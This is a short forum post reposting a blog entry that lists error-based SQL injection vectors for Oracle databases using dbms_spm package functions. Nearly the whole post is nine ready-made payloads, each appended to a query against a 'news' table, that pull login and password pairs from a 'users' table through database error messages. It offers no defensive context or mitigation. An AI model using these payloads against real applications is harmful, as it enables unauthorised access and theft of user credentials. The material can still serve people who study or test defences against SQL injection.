Nytro Posted April 3, 2015 Report Posted April 3, 2015 Error-based SQL Injection vectors in Oracle using dbms_spm.* functionsTesting tables:select * from news where id=1 and dbms_spm.alter_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users),1,1,1) is not null;select * from news where id=1 and dbms_spm.create_evolve_task((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;select * from news where id=1 and dbms_spm.drop_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;select * from news where id=1 and dbms_spm.evolve_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;select * from news where id=1 and dbms_spm.implement_evolve_task((select login||chr(58)||pass from users where id=1)) is not null;select * from news where id=1 and dbms_spm.load_plans_from_sqlset(1,(select login||chr(58)||pass from users where id=1),1) is not null;select * from news where id=1 and dbms_spm.migrate_stored_outline((select login||chr(58)||pass from users where id=1)) is not null;select * from news where id=1 and dbms_spm.report_auto_evolve_task(1,1,1,1,(select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;select * from news where id=1 and dbms_spm.report_evolve_task((select login||chr(58)||pass from users where id=1)) is not null;Posted by dsrbr at 9:48 AMSursa: http://dsrbr.blogspot.ru/ Quote
